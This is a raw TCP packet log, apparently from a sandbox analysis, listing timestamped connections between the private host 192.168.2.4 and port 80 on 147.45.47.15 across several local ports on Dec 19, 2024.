Dec 19, 2024 08:52:37.717952013 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.719300985 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.719317913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.719358921 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.721745014 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.722816944 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.723073959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.723217964 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.726488113 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.727350950 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.727407932 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.728745937 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.728806019 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.728981018 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.730149984 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.730308056 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.730350971 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.731293917 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.731348991 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.733944893 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.733954906 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.734009027 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.737576962 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.737587929 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.737627983 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.741058111 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.741350889 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.741391897 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.744702101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.744916916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.744983912 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.748553038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.748565912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.748624086 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.751441002 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.751992941 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.752197027 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.752238035 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.765979052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.766132116 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.766272068 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.766797066 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.767055988 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.767146111 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.767175913 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.768486023 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.768553972 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.769754887 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.770056963 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.770131111 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.771431923 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.771473885 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.771621943 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.771660089 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.773082972 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.773396969 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.773753881 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.774662018 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.774785042 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.776066065 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.776132107 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.776745081 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.776804924 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.777729034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.777740002 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.777786970 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.779016018 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.779258966 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.780561924 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.780623913 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.780706882 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.780761957 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.781919003 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.782126904 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.782176018 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.783397913 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.783638000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.784837961 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.784907103 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.784981966 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.785041094 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.786209106 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.786426067 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.786489010 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.787713051 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.787830114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.789182901 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.789195061 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.789230108 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.790393114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.790618896 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.790667057 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.791701078 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.791894913 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.793122053 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.793185949 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.793482065 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.793526888 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.794424057 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.794610977 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.794675112 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.795727968 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.796032906 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.797116995 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.797180891 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.797503948 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.797559023 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.798513889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.798693895 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.798753023 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.799787045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.799987078 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.800388098 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.800400972 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.800451040 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.800474882 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.801111937 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.801352978 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.801415920 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.801691055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.802081108 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.802092075 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.802192926 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.802725077 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.802774906 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.803157091 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.803544044 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.803584099 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.803762913 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.803774118 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.803812981 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.804534912 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.804548025 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.804614067 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.804903030 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.804915905 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.804961920 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.805571079 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.805928946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.806308985 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.806323051 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.806372881 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.806401014 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.806988955 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.807360888 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.807693958 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.807706118 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.807749987 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.808023930 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.808397055 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.808409929 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.808466911 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.809144020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.809504986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.809748888 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.809777975 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.809791088 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.809829950 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.810463905 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.810823917 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.810837030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.811033010 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.811506987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.811853886 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.811899900 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.812213898 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.812282085 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.813076019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.813330889 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.813575983 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.813589096 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.813652992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.813662052 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.814280987 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.814294100 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.814351082 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.815005064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.815356016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.815814018 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.815884113 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.816037893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.816050053 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.816087008 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.817003012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.817118883 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.817199945 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.817543030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.817553997 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.817605972 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.818361998 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.818542004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.818625927 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.818895102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.818907022 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.818967104 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.819591999 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.819994926 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.820128918 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.820313931 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.820357084 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.821050882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.821255922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.821268082 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.821330070 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.821952105 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.822304964 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.822316885 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.822382927 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.822408915 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.823213100 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.823362112 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.823417902 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.823906898 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.824047089 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.824059963 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.824325085 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.824760914 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.824829102 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.824856043 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.825123072 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.825136900 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.825202942 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.825772047 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.825783968 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.825854063 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.826534033 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.826829910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.826842070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.826908112 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.827713013 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.827770948 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.827887058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.828416109 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.828466892 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.828531027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.828948021 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.829001904 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.829250097 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.829262972 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.829396009 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.829953909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.829966068 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.830029011 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.830638885 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.830986023 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.831423044 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.831489086 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.831856012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.832016945 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.832118034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.832129955 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.832190037 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.832730055 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.832741976 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.832789898 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.833487034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.833991051 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.834070921 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.834130049 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.834522009 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.834575891 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.834806919 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.834820032 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.834865093 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.835758924 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.835969925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.835982084 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.836081028 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.836751938 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.836826086 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.837016106 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.837028027 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.837183952 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.837744951 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.838057995 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.838156939 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.838639021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.838788986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.838937998 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.839046955 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.839437008 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.839730978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.839797974 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.841201067 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.841368914 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.841450930 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.843133926 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.843326092 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.843394995 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.843643904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.844027042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.844161987 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.845885038 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.846055984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.846117020 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.846616030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.846826077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.846836090 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.846904993 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.847507954 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.847577095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.848143101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.848242998 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.848648071 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.848872900 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.848951101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.849313974 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.849380016 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.850557089 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.850727081 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.850742102 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.850857973 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.851353884 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.851445913 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.851775885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.852034092 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.852042913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.852865934 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.853075981 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.853142023 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.854088068 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.854296923 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.854386091 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.854876995 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.855015039 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.855072021 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.855463982 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.856062889 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.856139898 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.857690096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.857702017 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.857800007 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.858031034 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.858042955 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.858083010 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.858742952 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.858756065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.858803034 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.859880924 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.860052109 CET	80	49731	147.45.47.15	192.168.2.4
